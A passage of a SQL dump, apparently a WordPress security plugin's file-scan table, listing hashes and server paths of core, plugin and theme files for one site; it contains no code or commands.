,1,0,0,0,0,'d69df0b0d2bc726005b908e56c8b1958fb9139d7','/home/westonspirit.org.uk/public_html/wp-admin/update.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d6b6aae35af90da028439e191aee3012d4d5501c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d6d090f2081ab00a709e518b512cc4264547313e','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Rating.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d6e8c8aacc02f47181f58fe70208eab474e86793','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/border.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d740a6246b1dca4b39795a4eb839b6b95dbd0f7c','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/updates.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7433e62b8d5502e78ed6d61409ae971a584f764','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_dashboard.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d744fc8a1fb9301f42d38c4f730d2508faacee2b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/IPTraf.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d74d61d2365c5eeff71266c55d583b36693be34a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d74fbaa0a8eb3a8e8390bf7815d5d54927b4f080','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7768863febad4349a9f13c2ffb46d9744cddc82','/home/westonspirit.org.uk/public_html/wp-admin/link-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7a16db9f0feeb585dcf9d42c3b18eb2479e6f32','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base-multiple.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7ad0cc255e86c1c0da658ef46632da1b409aef7','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-plugin-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7b0e3a3bc30fd5729500f95f2ef13a905724279','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-bulk-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7b64ffa867375f903598270aef112d996f19944','/home/westonspirit.org.uk/public_html/wp-admin/includes/update.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7ca6d68c61df7e106dffdd1f7e7c22bde247e70','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/notices/elementor-dev-notice.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7cee30886249fa673c6a4608aec0c639af9afeb','/home/westonspirit.org.uk/public_html/wp-includes/formatting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7d96e9942c190d9605b0244bf3a19913d766650','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Category.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d7ec44e8a6af6359fe82014aece031e012d0b680','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_scanner_options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d82a57d53c78521c1e26902cbb6df792773115e5','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/HChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d87015dd990c03198e2b9f5c7e21e0febce75251','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-core-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d892737c364d8f71fda52566ee60439fec2c6299','/home/westonspirit.org.uk/public_html/wp-includes/media-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d89358ddbe37d77ef749374d34b1097eac5502ac','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-automatic-updater.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d8abd303f09a62e876f22f9c21aa953eea24f6ad','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d905e79e31b041b138c670ded3d818c90efc912f','/home/westonspirit.org.uk/public_html/wp-includes/rss-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d906c268e821f13a824acc1cccd29649897dc9a6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/breakpoints/breakpoint.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d92b3991e7deb2a095ab4fc1e0b67295ca32d846','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/color-patterns.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d94daba36e71e6f6339db3a6ef992627358156b2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfCrypt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d96b6a85b883c7c721342dbaebb6a75d5f0ce1e4','/home/westonspirit.org.uk/public_html/wp-admin/link-add.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9990abad8ad91d35a85bed94b5e4876c5c58ca7','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/gzdecode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9cf3598754fdf369ef18c79f4ba88806efe2826','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-application-passwords.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9e49e7c7683c020786ff0d3b98ce769bdf6b94d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-text.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9f75f97443d6d772fe03a996f3440c78cd6c95e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/processor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9fd9c2a2dfcbcf853b1127cb572ef4236550725','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d9fff11c536f5ec2f9f1095080a9e79da7c8e676','/home/westonspirit.org.uk/public_html/wp-admin/includes/post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da04d104b8bde5732c98d3940c7a4f7bedaaf4d0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da13b2c5675d262a297fd5d55296335a3275dc5a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/experiments/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da232749ae0b9bdd96659a7d4c507daf719eec0c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da51fc29afc5ce69960973f08db3f5eb1d88b6e4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da6ca3d53ccac3ebec6d8b13e77b331c51d5a07e','/home/westonspirit.org.uk/public_html/wp-admin/includes/meta-boxes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'da872f35957610b3ec3161f03b7ad27cb8109622','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/dev-tools/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'daf4769b94e147f0f830962695981ec59bcbb8b4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/user-favorites.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'db3ca488d31611363645e77a6a0461cef079421c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/root.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'db6ca00268f708931590bd7ebfeeacdebdd87544','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/firewall-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'db8e30dfeb3a28a82611d4c4e83a6c21fdb89eae','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/actions/random.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dbc6d98ddcaab419ebc67aee5d30796c3f73d25f','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dbcb78ac9accd0aca5bec836457d56758c39d3ed','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/upgrade/elementor-3-re-migrate-globals.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dc0afaf9c238c5da3cb4c3941b56f386997604df','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_static.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dc2562bf6362b0a082f3f1a3af89051c333fe5aa','/home/westonspirit.org.uk/public_html/wp-content/languages/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dcc95ef57ed3aaebd54ad26152427a6ef153927f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/plugins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dcf486267b3b30797e7166d9b7a3ec3989fa83ce','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-site-health.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dcfa1660273713aff9fd7fbbb9e9ed4cd4b02455','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfArray.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dd3e8a6f5bdf5cadf980ec9185083a1f09a8a438','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/text-shadow.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dd4d40cfe4258105ecdf999f279d3ac572214327','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dd525bc88da344106b2b83633223c9e15dc5f2b2','/home/westonspirit.org.uk/public_html/wp-admin/link-parse-opml.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dd767efe46e0c0d6f882dc9f86771f85b4b32ffa','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-post-comments-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dd7e303f8defa1ebd2d5340916e72d6909b5a6ca','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/elements-iteration-actions/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ddb239b772091d6aa499e71ef95babe3b2f8472e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ddbc416bd1d318f8b4d191feaff12bef73a10c49','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/template-parts/content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'de41120530ae26ed9b574901c8b581d4d2a28994','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'de5833283f8988f5844d18c02e516dad96381bf0','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url-match.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'de9d9b0b7d7e73feebb85afce15c6f7a55f328e3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dee7b61f16dd2be20a645d03fc7fb401a4e8dac4','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'df1314d6089a5e490c08ba7b90591de507761774','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/google-maps.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'df3e898973ed99e576e95efb6e3ca1602e784f33','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base-icon-font.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'df59c4a93d1a5e4ab433b048fea1fa522a768403','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dfaec5ddb7a6e9dbe89c117ea8c98cea091baac9','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/file-io.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dfafd0d8c0a50a1e03450761e4096207b153c2f2','/home/westonspirit.org.uk/public_html/wp-admin/network/theme-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dfc90ae78d9f1f50b33178d22e5ee77a413a9319','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/gallery.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'dfff7222ae224bbbfcfe2185b628cbd7e237ef9c','/home/westonspirit.org.uk/public_html/xmlrpc.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e01838f225dd5a9746e8b1e405bf918fe2943c05','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e023f5d640bc5271433e935988ab4b5d1c899e97','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/option-rules.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e02cfae7c92d9a91a10474520a649c8dc762a290','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e064f39f9fe3bb381fed8ee7b9fe3e919387b2c3','/home/westonspirit.org.uk/public_html/wp-admin/custom-background.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e0692027ae964b4057d77938211230f93ce85491','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-taxonomy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e07e366b8be0aa8f4456c295d5d3905a773a7932','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-import.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e09f8893c49704a3d6dab90656f313a60949fee5','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/431.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e0b0cc17136bc674710d0163558da128295d149a','/home/westonspirit.org.uk/public_html/wp-includes/rss.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e0b74c252e92bfc35aecfff7d818073ba3fe87eb','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e0c9add8f8de0a8eaf1b78dbf661bd806aba171e','/home/westonspirit.org.uk/public_html/wp-includes/Requests/IRI.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e0dbb109842bd2182019f1b54a4b807fee6440b9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/css/post-preview.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e1038132b8c58d2588f1ec6fd6816181342a55b5','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e12b00d3c6c0ff8353b428687b140f80a340c718','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/apps/connect.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e134d44a3b2eb3f236c149aa2c0dc5d76dea71da','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/divider.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e14eb3415b2d72a21523aa849587394aefb90f97','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/libraries/wp-background-process/wp-async-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e172780676480573895ca183d9bb94cf2bdaa620','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/typography.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e1d57f20014cda69730305188695c40e4fbb6a66','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDashboard.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e1d843204c560243d35479b12f04da5eb0c9bbc2','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/admin-bar/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e1ec7496f84fb78e767c0bd02394b1da3e40a9a3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/api.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e26ad60292dadbe8dc6fe376fc89603c36f887a5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e26ce2732c45cb7f273122931afdb81d1958c87a','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/412.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e28599135abcee12e4b9f99206c3ce639f2791b2','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-type.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e28a47008d1f37386965b2c53d34f24c2dea35dc','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-user-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e2a21b2e43c1f37815c36396e70d3f7fc22771e6','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-client.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e2ef97c0b7eacb26690abea5a2a9bc8460e580df','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/exit-animation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e3044b64d2abcdd7ea4fdf1ae1318073d494122e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/document-types/page-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e308b582a4f3cae26389fe3436362e542475a203','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e379f4cb47d6876e0fa8f2c42161b5e12aeeea4f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e3a030679a357afdd6c0d6a7a50eced4b66ef650','/home/westonspirit.org.uk/public_html/wp-admin/users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e3a54d09809f9c573693aee958d2ededb05b89ba','/home/westonspirit.org.uk/public_html/wp-admin/includes/menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e422143a480ee85f6f492cfca365a986417256ef','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e4237da01a68a8098acfb9c91c0b43bf591b8b3d','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-filesystem-ftpext.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e44faee8866c751f38a7316c6f6a9a21f0887500','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfIPWhitelist.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e4578d00648a2c9255cdae13150caf62abdadfcd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e4776f30195c306a5b8365c46c3363652a0036b0','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/240.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e4e544f8e27f3df7e224e6cd1093923f3e37cc05','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-widget-area-customize-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e4f87f5688429015d04144ae1e2a8b753ad6ab1d','/home/westonspirit.org.uk/public_html/wp-admin/async-upload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e51c30453a065242e89f76a73e7f3e8be0163ed7','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/resources-enqueue.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e537431a01b9f674bc48581d60220038e81c00bc','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Int64.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e59476620b8884c59ce467d216f64b08bcc649dd','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/503.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e5ab054ec1680f778a4ff16dde16770ffcb764e6','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/core/sanitize.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e5e4202569673323ece3d008782e9b0d68098ae3','/home/westonspirit.org.uk/public_html/wp-admin/network/menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e60b718a1031b15e463412d8b9a2842f67052ebd','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Ed25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e61a311294759dd21c3be03a893a221995b35db4','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/single.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e63c61ffe8034f54eeff52a47c6efeb55de475e6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e63e0f51da893d3b5975779d7af67fa95f6662e4','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/306.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e640a39cfaf40ce57ea8652959a793f82818cc8d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e656a1c3e2f68be34fadf6a5044944dd2aadebff','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e670679c70a5cb668c4a475b750676b9954a3f9e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e670f48eadc8ed54ae5a4ca50998143834c51b14','/home/westonspirit.org.uk/public_html/wp-includes/pomo/mo.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e770caeabe00fb8285766378d253c18a695e4f32','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/pomo/po.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e7c3333e75e8a2bb823fbf9e92d9162c465551ba','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/stylesheet.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e7f3c2854078e5b0a19831f17f181e4345bb534c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e806e0cfa7cf0f8aa91faf4bba1f887bd100f4bc','/home/westonspirit.org.uk/public_html/wp-includes/class-oembed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e823f98f08942e74aea54c5da22e5cf70d1ccdb2','/home/westonspirit.org.uk/public_html/wp-includes/ms-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e82741ba50bad81149f5d8e19d05cb7661379d74','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/controls.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e84741785b34ca76d9b3b2345ab5c77ae2b7a61a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e889e07038f4a4b106e79909060c8c9bf57227f7','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-requests-response.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e8bcacc10a062b509530d86fc302bd7600b805d4','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/XSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e8ce20f28af219f88ed3f0b8651583d23146f22d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/loggers/logger-interface.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e90ed4c61da768cbf852e745f8d78d8ad5b74b0f','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/pro/newsmagbd-admin-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e93d3b0b6aab2b30f8b1920fa31d7b2c21521214','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-object-cache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e96470b65da4e2624e618e78f1ae81f746735239','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/items/log-item-interface.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e99fc04294c0ed269633ac9f87d446e34dc82c81','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e9ea6cb870a79f24d909b3b702c2c8ab0537903e','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-panel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'e9f4bc88316868969354111b71418fa685384ef9','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ea198ce6791e49945676cda2016d85954dfeb7cb','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ea98f7a8b00896411f03cabd3bb9e9a7b4aad8ed','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/wp-exporter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eaa7a7eb02606feb1a4ee7387d41381ae9d1e8f1','/home/westonspirit.org.uk/public_html/wp-includes/author-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eacdd6b1c72c97a595c9a90943b241acb22393a6','/home/westonspirit.org.uk/public_html/wp-includes/pluggable.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eae29f6b37a953f4caf6f27bff46eaa80f81fe72','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-clientmult